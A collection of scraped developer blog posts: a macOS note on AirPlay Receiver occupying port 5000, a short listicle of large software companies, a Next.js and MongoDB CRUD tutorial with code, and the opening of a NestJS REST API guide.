<p>A long time ago, I started using 5000 ports for my projects. Usually, it is a web service. This is useful because you can't run many services on port 80. With port 5000, I can run containers with a web server, for example, on 5000, 5001, 5002, etc. This is easy to remember a thing. I started using it after some Flask (Python Framework) experience. </p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>So, I started another container and got an error "Port 5000 is already in use". I checked my compose file and open ports and didn't understand the issue. After some research, I remembered about OS updates. Okay, catch you! </p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>In macOS Monterey, Apple added the ability to use your Mac as an AirPlay device. For example, you can stream something from your iPhone to your MacBook. </p>
<!-- /wp:paragraph -->
<!-- wp:heading -->
<h2>Solution</h2>
<!-- /wp:heading -->
<!-- wp:paragraph -->
<p>Solution #1: This is stupid, but you could use a lot of other ports. For example, not I am using 6000 and other similar ports instead of 5000. Pros of this way are that you get AirPlay enabled on your Mac. There are a lot of open ports, but 5000 was like a habit (not a hobbit). </p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>Solution #2: You could disable AirPlay. Go to System Preferences - Sharing. At the bottom, you will see the checkbox AirPlay Receiver. Disable it to make the port open.</p>
<!-- /wp:paragraph -->
<!-- wp:image {"id":2619,"sizeSlug":"large","linkDestination":"none"} -->
<figure class="wp-block-image size-large"><img src="https://jakeroid.com/wp-content/uploads/2022/06/image-1024x844.png" alt="Port 5000 is already in use in macOS Monterey" class="wp-image-2619"/></figure>
<!-- /wp:image -->
<!-- wp:paragraph -->
<p>I prefer the first way because using AirPlay on my MacBook could be useful. Anyway, it's good to have a choice. I hope this small note was helpful to you. </p>
<!-- /wp:paragraph -->
<!-- wp:paragraph -->
<p>By the way, I made a small note about <a href="https://jakeroid.com/blog/how-to-remove-skype-icon-from-menu-bar/">how to remove the Skype icon from menubar on macOS</a>. Would you like to check it? </p>
<!-- /wp:paragraph --> | jakeroid |
1,273,159 | Top 5 Software Companies in the World | Top 10 software companies in the world Computers would be useless without programs that convert... | 0 | 2022-11-26T04:43:43 | https://dev.to/geekstalk/top-5-software-companies-in-the-world-20nm | <p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheBXEWHiKx6wzx-zm-x04zTDwNUNwkkGNEpOkQi9X4HReUJkDYB2IrAYzfBzSPULRsd4MV6hWDwN0yk_fmUfulKvoDLKd-Hd0q4zXkdf_orrfiN8PTLUCGw-a3WogkeFELNy3lH3ECxv_92kqjV3DqPznhXpAc0FadK4kLfZA-OKhivdYJw6qXXNaVDg/s1920/Top%2010%20software%20Companies%20in%20the%20world.jpg" style="margin-left: 1em; margin-right: 1em;"><img alt="Top 10 Software Companies in the World" border="0" data-original-height="1280" data-original-width="1920" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheBXEWHiKx6wzx-zm-x04zTDwNUNwkkGNEpOkQi9X4HReUJkDYB2IrAYzfBzSPULRsd4MV6hWDwN0yk_fmUfulKvoDLKd-Hd0q4zXkdf_orrfiN8PTLUCGw-a3WogkeFELNy3lH3ECxv_92kqjV3DqPznhXpAc0FadK4kLfZA-OKhivdYJw6qXXNaVDg/w348-h294/Top%2010%20software%20Companies%20in%20the%20world.jpg" title="Top 10 Software Companies in the World" width="348" /></a></div><br /><p></p><h1 style="text-align: left;">Top 10 software companies in the world </h1><br /><span style="font-size: medium;">Computers would be useless without programs that convert physical hardware into auxiliary functions discuss <b>Top 10 Software Companies in the World</b>. Software refers to programs and data that are executed on a computer. Software is classified into four categories: programming services, system services, open-source, and software as a service. Software companies make money through a variety of means, including software licensing, maintenance services, subscription fees, and support services. <br /><br />A software company develops and distributes computer software that can be used to learn, instruct, evaluate, calculate, entertain, or perform a multitude of other tasks. Software companies operate under a variety of business models, such as charging license fees, offering subscriptions, or charging transactions. Customers can now pay a monthly subscription fee to gain instant access to software on provider servers using cloud technology. Which is growing rapidly. Region. Software companies are among the world's largest developers of enterprise solutions. <br /><br />Without software, it is impossible to conduct day-to-day business in the technology industry. Software is available for a variety of purposes including entertainment, business and security. So, let's take a look at some of the top ten software companies in terms of revenue or ancillary. These are the top 10 software companies based on past 12 months sales. </span><br /><br /><h2 style="text-align: left;">1. Microsoft</h2><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiASkVgk_cG8tqnHeQxAu-1W4UJ3Kbhwz-zsrrCJi5zFmA0_bMNmLDIX_p6eVGfD7sCJJEKph8YnlFMkvzMNvdAKPqk8FnfgbpU-JwXwjTjuezNDg5tA0j-IHNfZVTLcLjzOnSTYNFFT-_2CPi6rQ5ZtbqGt3fN39eusMFPtbaPdGotWNqBMACRmXUDuA/s367/top-10-software-companies-in-the-world1.png" style="margin-left: 1em; margin-right: 1em;"><img alt="Top 10 Software Companies in the World" border="0" data-original-height="137" data-original-width="367" height="119" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiASkVgk_cG8tqnHeQxAu-1W4UJ3Kbhwz-zsrrCJi5zFmA0_bMNmLDIX_p6eVGfD7sCJJEKph8YnlFMkvzMNvdAKPqk8FnfgbpU-JwXwjTjuezNDg5tA0j-IHNfZVTLcLjzOnSTYNFFT-_2CPi6rQ5ZtbqGt3fN39eusMFPtbaPdGotWNqBMACRmXUDuA/w320-h119/top-10-software-companies-in-the-world1.png" title="Top 10 Software Companies in the World" width="320" /></a></div><br /><span style="font-size: medium;"><a href="https://en.wikipedia.org/wiki/Microsoft" target="_blank">Microsoft</a> offers a diverse set of products and services. Microsoft was founded in 1975 by bill gates and paul allen. Some of the most popular microsoft software products are the windows operating system, the microsoft office suite, and the internet explorer and edge web browsers. The company's main selling gear is the microsoft surface line of xbox video game consoles and touchscreen personal pcs. Microsoft was ranked 21st in the fortune 500 list of the largest companies in the united states in 2020. It is one of the largest software firms in the world in terms of revenue. It is one of the "big five" corporations in the information technology industry in the united states. M / s. Office makes basic office tasks more manageable and increases productivity. Each program corresponds to certain activities, such as word processing, data management, presentation creation, and email management. </span><br /><br /><h2 style="text-align: left;">2. Oracle </h2><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDXukkZ2DssNi68ZZlZt1MLQKVP52_kRrWhZdZ0giEebqaEQCqU7pZBJjdUHK6_ZLrH9USIDFOJNEq6C1HF2YYYTBeSbOMV8wJdTHHiEI-W5fjk6KpzsuW2GbGTd9_aZ6aKk0ROP01_JTBIQ-4uNUAlX90NTkny7CwfyIOkf0mtzcfR44x5mmGze2xAw/s360/top-10-software-companies-in-the-world2.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img alt="Top 10 Software Companies in the World" border="0" data-original-height="46" data-original-width="360" height="41" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDXukkZ2DssNi68ZZlZt1MLQKVP52_kRrWhZdZ0giEebqaEQCqU7pZBJjdUHK6_ZLrH9USIDFOJNEq6C1HF2YYYTBeSbOMV8wJdTHHiEI-W5fjk6KpzsuW2GbGTd9_aZ6aKk0ROP01_JTBIQ-4uNUAlX90NTkny7CwfyIOkf0mtzcfR44x5mmGze2xAw/w320-h41/top-10-software-companies-in-the-world2.png" title="Top 10 Software Companies in the World" width="320" /></a><br /><br /><span style="font-size: medium;"><a href="https://en.wikipedia.org/wiki/Oracle" target="_blank">Oracle</a> is the second largest software company in the world. Larry ellison, bob miner and ed oates launched it on june 16, 1977. Oracle is located in redwood city, california. This company is the largest provider of database software and software as a service (saas) in the world. Oracle generated $32.9 billion in global revenue last year. Oracle software is commonly used in customer relationship management (crm), enterprise resource planning (erp), oracle epm cloud, human capital management (hcm), and supply chain management (scm). </span><br /><br /><h2 style="text-align: left;">3. Sap</h2></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEtZ9ToEF3-xp6DjK0v7KYkhMYOBJVCg9IpfTWOWKtpSLUDZsYplznLOJagROx8VRnG2WT95ykHw-kTOeWJmt9FB-_o4gn0Ay9E1_cmH7EF2UNo2XrxQv3j12dneG8oYs85_VCaVWpYFiJ4f-SLs4py1j4UTBsToK78zb_Ho8MrNm-qq8iSWfqzQ3PkA/s371/top-10-software-companies-in-the-world3.png" style="margin-left: 1em; margin-right: 1em;"><img alt="Top 10 Software Companies in the World" border="0" data-original-height="135" data-original-width="371" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEtZ9ToEF3-xp6DjK0v7KYkhMYOBJVCg9IpfTWOWKtpSLUDZsYplznLOJagROx8VRnG2WT95ykHw-kTOeWJmt9FB-_o4gn0Ay9E1_cmH7EF2UNo2XrxQv3j12dneG8oYs85_VCaVWpYFiJ4f-SLs4py1j4UTBsToK78zb_Ho8MrNm-qq8iSWfqzQ3PkA/w320-h116/top-10-software-companies-in-the-world3.png" title="Top 10 Software Companies in the World" width="320" /></a></div><br /><div><br /></div>
[Read More](https://www.geekstalk.space/2022/10/top-10-software-companies-in-world.html) | geekstalk | |
1,239,443 | A complete guide to Next.js plus MongoDB | by Joseph Chege Next.js is a database-agnostic web-based framework. It incorporates the latest... | 0 | 2022-11-02T00:10:26 | https://blog.openreplay.com/a-complete-guide-to-nextjs-plus-mongodb/ | react, mongodb, nextjs, webdev | by [Joseph Chege](https://blog.openreplay.com/authors/joseph-chege)
[Next.js](https://nextjs.org/) is a database-agnostic web-based framework. It incorporates the latest minimalistic technologies that help developers create web apps with minimal code bases. [MongoDB](https://www.mongodb.com/) is one of the most popular NoSQL databases. It would be ideal to discuss how to run MongoDB using Next.js applications. The tutorial will explain how to create a Next.js application, connect it to MongoDB, and perform database operations.
To fully understand this article, it is essential to have the following:
- [Node.js](https://nodejs.org/en/) installed on your computer.
- [MongoDB](https://www.mongodb.com/try/download/community) installed on your computer.
- Basic knowledge working with Next.js and JavaScript.
## Reasons for Running Next.js with MongoDB
Creating an application that leverages Next.js and MongoDB provides several benefits. These include:
- MongoDB provides cloud-hosted services using [MongoDB Atlas](https://www.mongodb.com/atlas/database). You can run your MongoDB anywhere and leverage its cloud-native capabilities.
- Easy deployment. Given that MongoDB provides cloud-hosted access, it becomes easy to deploy your full-stack application to hosting services such as [Vercel](https://medium.com/nerd-for-tech/5-reasons-why-vercel-is-the-best-for-application-deployment-92009b17e601). Such clouds platform fit perfectly with your Next.js and MongoDB workflow.
- Next.js and MongoDB with One Click - With just one command, you can get a whole Next.js and MongoDB boilerplate application that you can use to create your extensive Next.js and MongoDB applications.
- Next.js is a server-side rendering (SSR) and static site generation (SSG) supported framework. This means you don't need an additional server to run MongoDB. Using Next.js; you can run your whole Next.js and MongoDB infrastructure within a single code base.
- Next.js [has a list of developer benefits](https://pagepro.co/blog/pros-and-cons-of-nextjs/#pros-of-nextjs-for-developers). These include greater community support, fast refresh, automatic Typescript configuration, API routes for Node.js serverless functions, etc.
Let's now dive and create a Next.js application. In this article, we will implement a posts application using Next.js and MongoDB.
## Setting up a Next.js App
To create this application, we will use a one-time command that lets you create a MongoDB Next.js basic project. This will allow you to create an application ready and configured with all dependencies needed to access MongoDB. Proceed to your preferred working directory. Run the following command to bootstrap the application:
```
npx create-next-app --example with-mongodb posts_app
```
Here we use the usual `npx create-next-app` command to create a Next.js application locally. Adding the `--example with-mongodb` flag will instruct Next.js to bootstrap a template application with ready to use MongoDB setup. Finally, `posts_app` creates the directory where the bootstrapped application will be saved in your working directory.
The above `create-next-app` command will create your application using Yarn as the default package manager. To create Next.js with your favorite package manager, you can go ahead and add the following flags right after `create-next-app`:
- Using NPM - `--use-npm`
- Using PNPM - `--use-pnpm`
Any of the above flags will Instruct the CLI to explicitly use the package of your choice to generate the project.
Note: Running the above command may take a moment, depending on your internet speed. Once the installation is done, proceed to the newly created `posts_app` directory:
```
cd posts_app
```
## Setting a MongoDB Environment
We need a working MongoDB environment to execute with Next.js. You can use the locally installed [MongoDB Compass](https://www.mongodb.com/try/download/community) or the [cloud-hosted MongoDB Atlas](https://www.mongodb.com/atlas/database). Using your environment choice, go ahead and copy your MongoDB connection URI. Next.js will use this URI to connect to MongoDB. Once the URI is ready, go ahead and rename `.env.local.example` to `.env.local`.
Paste in the MongoDB connection URI to `.env.local`. Below is an example URI of a locally installed MongoDB Compass.
```
MONGODB_URI="mongodb://localhost:27017/posts"
```
At this point, we can run the application to check if Next.js can connect to the database. Start the development server using the following command:
```
npm run dev
```
Open the application using `http://localhost:3000/` on the browser. If the URI you have provided is not working correctly, Next.js will return the following error on your page:

If Next.js can access your MongoDB database, a **You are connected to MongoDB** message will be logged in your page as follows:

Let's digest how the created template connects to MongoDB. What makes the one-time Next.js MongoDB useful? When connecting these two, you must write a script to execute a MongoDB connection back to Next.js.
When setting up the application, a `lib/mongodb.ts` file was created. This file contains the script needed to connect to your database. as follows:
```javascript
import { MongoClient } from 'mongodb'
if (!process.env.MONGODB_URI) {
throw new Error('Invalid environment variable: "MONGODB_URI"')
}
const uri = process.env.MONGODB_URI
const options = {}
let client
let clientPromise: Promise<MongoClient>
if (!process.env.MONGODB_URI) {
throw new Error('Please add your Mongo URI to .env.local')
}
if (process.env.NODE_ENV === 'development') {
// In development mode, use a global variable so that the value
// is preserved across module reloads caused by HMR (Hot Module Replacement).
if (!global._mongoClientPromise) {
client = new MongoClient(uri, options)
global._mongoClientPromise = client.connect()
}
clientPromise = global._mongoClientPromise
} else {
// In production mode, it's best to not use a global variable.
client = new MongoClient(uri, options)
clientPromise = client.connect()
}
// Export a module-scoped MongoClient promise. By doing this in a
// separate module, the client can be shared across functions.
export default clientPromise
```
Basically, this script creates a client that connects to your database. It saves the connection created and exports it so that other modules and functions you create can use the same connection to execute different operations to the database.
In any case, if you just use the `npx create-next-app posts_app`, you would be required to:
- Install MongoDB dependencies to your project
- Write a script to connect and save the connection as illustrated in the above `lib/mongodb.ts` file.
Great, you now have a complete MongoDB Next.js setup. Let's now dive in and build CRUD operations using this stack.
## Setting up the API Routes
Next.js allows you to create serverless API routes without creating an entire backend server. [API routes](https://nextjs.org/docs/api-routes/introduction) provide a solution to build your API with Next.js. Next.js uses server-side bundles that treat server code as an API endpoint instead of a page. It does that using alias `pages/api` path. This way, any file under `api` will be treated as an endpoint. This provides an easy solution to build your own API within the same codebase.
### Creating API Handler Functions
Let's dive in and implement an API that will allow us to execute MongoDB. We will create a posts app that supports CRUD operations. Therefore, we need to create API functionalities for handling each procedure.
In the project folder, under the `pages` directory, create a folder and name it `api`. Inside the `api` directory, we will create the following files:
- `addPost.js`: For handling the functionality of creating posts.
```javascript
import clientPromise from "../../lib/mongodb";
export default async (req, res) => {
try {
const client = await clientPromise;
const db = client.db("posts");
const { title, content } = req.body;
const post = await db.collection("posts").insertOne({
title,
content,
});
res.json(post);
} catch (e) {
console.error(e);
throw new Error(e).message;
}
};
```
The above API will connect to the database and look for the `posts`. MongoDB's `insertOne` method will send a request to the server to add data to the database and return the sent response.
- `getPosts.js`: For handling the functionality of getting multiple posts.
```javascript
import clientPromise from "../../lib/mongodb";
export default async (req, res) => {
try {
const client = await clientPromise;
const db = client.db("posts");
const posts = await db.collection("posts").find({}).limit(20).toArray();
res.json(posts);
} catch (e) {
console.error(e);
throw new Error(e).message;
}
};
```
To get data from MongoDB, use the `find()` method and the collection you want to fetch data from. Here you can add parameters such as `limit()`. This will instruct the server to return the total number of posts it should fetch from the database.
- `getPost.js`: For handling the functionality of getting a single post.
```javascript
import clientPromise from "../../lib/mongodb";
import { ObjectId } from "mongodb";
export default async (req, res) => {
try {
const client = await clientPromise;
const db = client.db("posts");
const { id } = req.query;
const post = await db.collection("posts").findOne({
_id: ObjectId(id),
});
res.json(post);
} catch (e) {
console.error(e);
throw new Error(e).message;
}
};
```
Here we need to execute a request to get a single post. This will allow us to handle methods such as UPDATE. `findOne()` will return the specific id of each post, making it easier to edit the given post properties.
- `editPost.js`: For handling the functionality of updating a post.
```javascript
import clientPromise from "../../lib/mongodb";
import { ObjectId } from "mongodb";
export default async (req, res) => {
try {
const client = await clientPromise;
const db = client.db("posts");
const { id } = req.query;
const { title, content } = req.body;
const post = await db.collection("posts").updateOne(
{
_id: ObjectId(id),
},
{
$set: {
title: title,
content: content,
},
}
);
res.json(post);
} catch (e) {
console.error(e);
throw new Error(e).message;
}
};
```
Using the `updateOne()` MongoDB method, we can execute an endpoint to send updated data to the server. Here we need to return the existing post and send an update request to the database on the post id.
- `deletePost.js`: For handling the functionality of deleting a post.
```javascript
import clientPromise from "../../lib/mongodb";
import { ObjectId } from "mongodb";
export default async (req, res) => {
try {
const client = await clientPromise;
const db = client.db("posts");
const { id } = req.query;
const post = await db.collection("posts").deleteOne({
_id: ObjectId(id),
});
res.json(post);
} catch (e) {
console.error(e);
throw new Error(e).message;
}
};
```
Likewise, `deleteOne()` will get the job done whenever you want to delete an existing post from the database.
## Setting up Next.js Components
To allow easy navigation around the application, we will add components to Next.js. Create a `components` directory in the project root folder (`post_app`). Inside the `components` folder, create the following files:
- `Nav.tsx`: Navigation bar.
```javascript
import React from "react";
import styles from "./styles/Nav.module.css";
export default function Nav() {
return (
<nav className={styles.navbar}>
<div className={styles.navItems}>
<ul>
<li>
<a href="/">My Posts</a>
</li>
<li>
<a href="/posts">Add Post</a>
</li>
</ul>
</div>
</nav>
);
}
```
This Navigation bar will allow you to execute two routes/pages:
1. Home page for displaying posts - denoted using the `/` path.
2. Add a post page for adding new posts - the `/posts` path denotes this page.
We will configure the above pages later in this guide.
- `Layout.tsx`: General application layout.
```javascript
import React from "react";
import Navbar from "./Nav";
export default function Layout(props: any) {
return (
<div>
<Navbar />
{props.children}
</div>
);
}
```
To add basic styling to the above components, create the `styles` directory inside the `components` directory. Then create the following file and add the respective styling:
- `Nav.module.css`: Navigation bar styles.
```css
.navbar {
border-bottom: 1px #d4d4d4;
width: 100%;
display: flex;
justify-content: center;
border-bottom: 1px solid #d4d5d5;
}
.navItems ul {
display: flex;
justify-content: space-between;
align-items: center;
list-style-type: none;
}
.navItems ul li {
margin-right: 10px;
}
.navItems ul li a {
text-decoration: none;
}
```
<h2>Open Source Session Replay</h2>
_<a href="https://github.com/openreplay/openreplay" target="_blank">OpenReplay</a> is an open-source, session replay suite that lets you see what users do on your web app, helping you troubleshoot issues faster. OpenReplay is self-hosted for full control over your data._

_Start enjoying your debugging experience - <a href="https://github.com/openreplay/openreplay" >start using OpenReplay for free</a>._
## Setting up the Application Pages
[Pages](https://nextjs.org/docs/basic-features/pages) are [React components](https://reactjs.org/docs/components-and-props.html) accessible as routes on the browser.
Next.js provides a `pages` folder that treats files as routes, and every page has a route mapped to it based on its file name. Let's dive in and implement pages for executing the CRUD operations based on the API endpoints we created.
In the `pages` directory, we will need the following:
- `index.tsx`: The home page showing the added posts. This file is already created in your project `pages` folder.
- `posts` directory: To host the following files:
- `index.tsx`: For adding a post.
- `[id].tsx`: For editing a post.
Ensure you create the `posts` folder inside the `pages` directory and add the above two files.
### Setting up the Home Page
The home page's content will be hosted inside the `pages/index.tsx` file. First, we will display the Navigation and Layout component we created. We will then create a component to display the posts from the database. Inside this component, we will add two buttons:
- To delete each post.
- To launch the edit page and update the selected post.
### Getting Data from MongoDB
In the `pages/index.tsx`, import the necessary packages:
```javascript
import {useState} from 'react';
import Layout from '../components/Layout';
```
Define the types for getting Posts as follows:
```javascript
type Props = {
posts: [Post]
}
type Post = {
_id: String;
title: String;
content: String;
}
```
Get the posts from the server using the `getServerSideProps()`:
```javascript
export async function getServerSideProps() {
try {
let response = await fetch('http://localhost:3000/api/getPosts');
let posts = await response.json();
return {
props: { posts: JSON.parse(JSON.stringify(posts)) },
};
} catch (e) {
console.error(e);
}
}
```
[getServerSideProps](https://nextjs.org/docs/basic-features/data-fetching/get-server-side-props) is a method that renders at run time. It instructs Next.js components to populate props and render them into a static HTML page at run time. This means the components are rendered on the client, waiting for a request to be made to the server. Next.js doesn't send JavaScript to the browser when the request is made; it just renders the components in HTML pages in real-time.
In this example, we use `getServerSideProps` for data fetching directly from the server. I.e., the API we create. Here we are executing a request to read the data and return the value to the props. This way, the page can be [hydrated](https://reactjs.org/docs/react-dom.html#hydrate) correctly, as any component can be sent to the client in the initial HTML, even when fetching data from a server.
Go ahead and define the function to render the view to the client as follows:
```javascript
export default function Posts(props: Props) {
const [posts, setPosts] = useState < [Post] > props.posts;
const handleDeletePost = async (postId: string) => {
try {
let response = await fetch(
"http://localhost:3000/api/deletePost?id=" + postId,
{
method: "POST",
headers: {
Accept: "application/json, text/plain, */*",
"Content-Type": "application/json",
},
}
);
response = await response.json();
window.location.reload();
} catch (error) {
console.log("An error occurred while deleting ", error);
}
};
}
```
Note that we are adding how to handle the post-delete functionality. When the component is rendered to the client, we want the client to be able to delete any select post. Therefore, endure you add the `postId` id to the delete endpoint. This way, the server will know which post to delete from the database. When the delete is successful, reload the page using `window.location.reload()` and return the new list of available posts.
Finally, return the view to the client inside the above `Posts()` method as follows:
```javascript
return (
<Layout>
<div className="posts-body">
<h1 className="posts-body-heading">Top 20 Added Posts</h1>
{posts.length > 0 ? (
<ul className="posts-list">
{posts.map((post, index) => {
return (
<li key={index} className="post-item">
<div className="post-item-details">
<h2>{post.title}</h2>
<p>{post.content}</p>
</div>
<div className="post-item-actions">
<a href={`/posts/${post._id}`}>Edit</a>
<button onClick={() => handleDeletePost(post._id as string)}>
Delete
</button>
</div>
</li>
);
})}
</ul>
) : (
<h2 className="posts-body-heading">Ooops! No posts added so far</h2>
)}
</div>
<style jsx>
{`
.posts-body {
width: 400px;
margin: 10px auto;
}
.posts-body-heading {
font-family: sans-serif;
}
.posts-list {
list-style-type: none;
display: block;
}
.post-item {
width: 100%;
padding: 10px;
border: 1px solid #d5d5d5;
}
.post-item-actions {
display: flex;
justify-content: space-between;
}
.post-item-actions a {
text-decoration: none;
}
`}
</style>
</Layout>
);
```
Here we will display the posts from the database. Each post will have a button to delete and edit it. We are also adding a path that will execute the edit route.
Let's check the app and see what we got so far. Ensure your server is up and running, or use the following command:
```
npm run dev
```
Open the application using `http://localhost:3000/` on the browser to view the application.

Here is our application. And **Oops! No posts have been added so far**. Let's dive in and add some posts.
### Adding Posts to MongoDB
In `pages/posts/index.tsx`, import the necessary packages:
```javascript
import React, { useState } from "react";
import Layout from "../../components/Layout";
```
Define a function for adding a post:
```javascript
export default function AddPost() {
const [title, setTitle] = useState("");
const [content, setContent] = useState("");
const [error, setError] = useState("");
const [message, setMessage] = useState("");
const handleSubmit = async (e: any) => {
e.preventDefault();
if (title && content) {
try {
let response = await fetch("http://localhost:3000/api/addPost", {
method: "POST",
body: JSON.stringify({
title,
content,
}),
headers: {
Accept: "application/json, text/plain, */*",
"Content-Type": "application/json",
},
});
response = await response.json();
setTitle("");
setContent("");
setError("");
setMessage("Post added successfully");
} catch (errorMessage: any) {
setError(errorMessage);
}
} else {
return setError("All fields are required");
}
};
}
```
Inside the above `AddPost()`, render a form to insert data as follows:
```javascript
return (
<Layout>
<form onSubmit={handleSubmit} className="form">
{error ? <div className="alert-error">{error}</div> : null}
{message ? <div className="alert-message">{message}</div> : null}
<div className="form-group">
<label>Title</label>
<input
type= "text"
placeholder= "Title of the post"
onChange={(e) => setTitle(e.target.value)}
value={title}
/>
</div>
<div className="form-group">
<label>Content</label>
<textarea
name= "content"
placeholder= "Content of the post"
value={content}
onChange={(e) => setContent(e.target.value)}
cols={20}
rows={8}
/>
</div>
<div className="form-group">
<button type="submit" className="submit_btn">
Add Post
</button>
</div>
</form>
<style jsx>
{`
.form {
width: 400px;
margin: 10px auto;
}
.form-group {
width: 100%;
margin-bottom: 10px;
display: block;
}
.form-group label {
display: block;
margin-bottom: 10px;
}
.form-group input[type="text"] {
padding: 10px;
width: 100%;
}
.form-group textarea {
padding: 10px;
width: 100%;
}
.alert-error {
width: 100%;
color: red;
margin-bottom: 10px;
}
.alert-message {
width: 100%;
color: green;
margin-bottom: 10px;
}
`}
</style>
</Layout>
);
```
Let's test this functionality. Click **Add Post** on your application.

Enter the post details and click the **Add Post** button. If the post is successfully added, a message will be displayed as so:

If you head over to the home page or click **My Posts**, you should get the added posts:

Likewise, these changes should be reflected in your database as follows:

You can also try to see if delete is working as expected.
### Updating Posts to MongoDB
At this point, our application can communicate with MongoDB and add, read and delete items. Let's now try to update these added items from Next.js.
In the `pages/posts/[id].tsx` file import the necessary packages:
```javascript
import React, { useState } from "react";
import type { GetStaticPropsContext, GetStaticPropsResult } from "next";
import Layout from "../../components/Layout";
```
Define the types sending updated values:
```javascript
type PageParams = {
id: string;
};
type ContentPageProps = {
post: Post;
};
type Post = {
_id: string;
title: string;
content: string;
};
type ResponseFromServer = {
title: string;
content: string;
_id: string;
};
```
Statically get the post by sending an API request to the database:
```javascript
export async function getStaticProps({
params,
}: GetStaticPropsContext<PageParams>): Promise<
GetStaticPropsResult<ContentPageProps>
> {
try {
let response = await fetch(
"http://localhost:3000/api/getPost?id=" + params?.id
);
let responseFromServer: ResponseFromServer = await response.json();
return {
// Passed to the page component as props
props: {
post: {
_id: responseFromServer._id,
title: responseFromServer.title,
content: responseFromServer.content,
},
},
};
} catch (e) {
console.log("error ", e);
return {
props: {
post: {
_id:" ",
title:" ",
content:" ",
},
},
};
}
}
export async function getStaticPaths() {
let posts = await fetch("http://localhost:3000/api/getPosts");
let postFromServer: [Post] = await posts.json();
return {
paths: postFromServer.map((post) => {
return {
params: {
id: post._id,
},
};
}),
fallback: false, // can also be true or 'blocking'
};
}
```
Define the function to render the view.
```javascript
export default function EditPost({
post: { _id, title, content },
}: ContentPageProps) {
const [postTitle, setPostTitle] = useState(title);
const [postContent, setPostContent] = useState(content);
const [error, setError] = useState("");
const [message, setMessage] = useState("");
const handleSubmit = async (e: any) => {
e.preventDefault();
if (postTitle && postContent) {
try {
let response = await fetch(
"http://localhost:3000/api/editPost?id=" + _id,
{
method: "POST",
body: JSON.stringify({
title: postTitle,
content: postContent,
}),
headers: {
Accept: "application/json, text/plain, */*",
"Content-Type": "application/json",
},
}
);
response = await response.json();
setPostTitle("");
setPostContent("");
setError("");
setMessage("Post edited successfully");
} catch (errorMessage: any) {
setError(errorMessage);
}
} else {
return setError("All fields are required");
}
};
// no such post exists
if (!title && !content && !id && process.browser) {
return (window.location.href = "/");
}
return (
<Layout>
<form onSubmit={handleSubmit} className="form">
{error ? <div className="alert-error">{error}</div> : null}
{message ? <div className="alert-message">{message}</div> : null}
<div className="form-group">
<label>Title</label>
<input
type= "text"
placeholder= "Title of the post"
onChange={(e) => setPostTitle(e.target.value)}
value={postTitle ? postTitle : ""}
/>
</div>
<div className="form-group">
<label>Content</label>
<textarea
name= "content"
placeholder= "Content of the post"
value={postContent ? postContent : ""}
onChange={(e) => setPostContent(e.target.value)}
cols={20}
rows={8}
/>
</div>
<div className="form-group">
<button type="submit" className="submit_btn">
Update
</button>
</div>
</form>
<style jsx>
{`
.form {
width: 400px;
margin: 10px auto;
}
.form-group {
width: 100%;
margin-bottom: 10px;
display: block;
}
.form-group label {
display: block;
margin-bottom: 10px;
}
.form-group input[type="text"] {
padding: 10px;
width: 100%;
}
.form-group textarea {
padding: 10px;
width: 100%;
}
.alert-error {
width: 100%;
color: red;
margin-bottom: 10px;
}
.alert-message {
width: 100%;
color: green;
margin-bottom: 10px;
}
`}
</style>
</Layout>
);
}
```
Ensure your development server is up and running. On your home page, click Edit:

The selected post will be loaded to the update form placeholder:

You can now go ahead and edit your post. Once done, click **Submit**. Changes will be reflected as such. Note that these changes should be reflected in your database as well.
## Conclusion
That's a wrap for this guide. You can now comfortably execute any operations to your database exclusively using Next.js. For any code references, check the application on this [GitHub repository](https://github.com/kimkimani/nextjs_with-mongodb).
I hope you found this helpful. Happy coding!
> A TIP FROM THE EDITOR: For more on MongoDB plus Next, don't miss our [Authentication And DB Access With Next, Prisma, And MongoDB](https://blog.openreplay.com/authentication-and-db-access-with-next-prisma-and-mongodb/) article!
[](https://newsletter.openreplay.com/)
| asayerio_techblog |
1,239,792 | Build Restful Api With Nestjs the Right Way | Foreword If you are new with NestJS or you have been worked with it for several projects, this... | 0 | 2022-11-02T05:17:18 | https://dev.to/nextjsvietnam/build-restful-api-with-nestjs-the-right-way-4606 | nestjs, restapi, nextjsvietnam, typescript | > Foreword
If you are new with NestJS or you have been worked with it for several projects, this post is for you. In this article, I'll share with you the real world process to build a Restful API from scratch with NestJS
Okie, let's start. Imagination, we've already have detail specifications.
This is our requirements in this sample:
Create Restful API for a image storage service that allow:
1. Users can register to the system. They need to verify their account before using it (via email).
2. Users can only use the system if they have an active account
3. Users can upload images with png,jpg,jpeg format. The maximum size is 5MB
4. User's images won't be public unless they created a shared link and share with other people.
5. User's images can be used on other websites
6. A user has maximum 100 images.
7. A system will delete unused image(unused more than 1 year) automatically every weekends.
Infrastructure requirements:
1. Local : Local Docker
2. Staging: Run on VM with Docker
3. Production: Host everything on AWS
First of all, we need to write down what we have to do.
- [x] Install NestJS CLI
- [x] Setup your dev tools: vscode, config for debug, code linter
- [x] Design source code structure: seperate them into layers
- [x] Setup your local docker (database only)
- [x] Setup your application's configuration
- [x] Setup data access layer and configuration
- [x] Business Layer: define business models: inputModels, outputModels
- [x] Presentation Layer: define controllers
- [x] Presentation Layer: integrate data validation from business models
- [x] Business Layer: define business service
- [x] Presentation Layer: integrate with business layer
- [x] Presentation Layer: create swagger - the api document
- [x] Persistence Layer: define database's entities, create and run migration scripts, seeds
- [x] Persistence Layer: define repositories
- [x] Business Layer: integrate repository with business layer
- [x] Setup your staging docker: dockerfile, docker compose, setup scripts
- [x] Setup your CI/CD flow and setup on your staging
- [x] Design and setup AWS Infrastructure
### And assume that we already have the high level designs



## Step 1 : Install NestJS CLI
```bash
npm i -g @nestjs/cli
nest new your-project-name
```
